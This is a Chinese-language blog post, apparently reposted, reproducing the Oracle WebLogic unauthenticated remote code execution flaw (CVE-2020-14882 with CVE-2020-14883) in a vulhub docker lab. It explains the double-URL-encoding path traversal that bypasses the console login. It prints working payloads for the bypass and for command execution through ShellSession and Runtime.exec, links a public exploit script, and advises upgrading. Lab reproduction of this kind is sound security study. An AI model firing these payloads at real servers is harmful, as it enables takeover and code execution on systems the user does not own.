经典weblogic未授权命令执行漏洞复现
2022-9-12 00:1:58 Author: 橘猫学安全(查看原文) 阅读量:16 收藏

      远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。
OracleWebLogicServer
版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
1使docker
git clone  https://github.com/vulhub/vulhub.gitcd weblogic/CVE-2020-14882docker-compose up -d
docker ps   //查看镜像信息
访问页面:
漏洞成因
后台界面实际上访问的是/console/console.portal,然后我们查看weblogic后台对应的webapp的web.xml(后台本身也算是一个webapp)
调用链:AsyncInitServlet#server-->MBeanUtilsInitSingleFileServlet.#server-->SingleFileServlet#server-->UIServlet#server分析详情参考:https://www.anquanke.com/post/id/221752


通过访问console.portal文件绕过登录直接进入后台

payload:http://yourip:7001/console/images/%252E%252E%252Fconsole.portalpayload解析:URLDecoder.decode执行完成后,我们的url路径(images/%2e%2e%2f)被再次解码,最终变成images/…/console.portal.portal,导致目录穿越。根据http规定,url部分,需要url编码后发送给服务器。服务器正常解开并继续处理。这是第一层url编码。URLDecoder.decode()对URL进行了二次编码从而绕过限制。servlet中先处理二次编码的poc,然后再有鉴权代码去鉴权,欺骗服务器后,服务器发现有权限访问静态资源(/console/images/%252E%252E%252Fconsole.portal ,其实有…/),然后就让我console.portal,从而接管后台。
成功的绕过登录进入后台
进入后台后进行命令执行
方法1:
payload:?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/test%27);%22);进行文件写入

进入docker中查看:
可以利用这一点进行getshell
方法2:利用公开的脚本:
https://github.com/backlion/CVE-2020-14882_ALL
成功执行

升级到最新版本
转自:格物安全
如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247498401&idx=2&sn=a5580a1397b52e4eda08d06743231771&chksm=c04d7d9ff73af48944c5e5db1c47305bd60c90119c6a6a56e666420593731d4d8402635d87ab#rd
如有侵权请联系:admin#unsafe.sh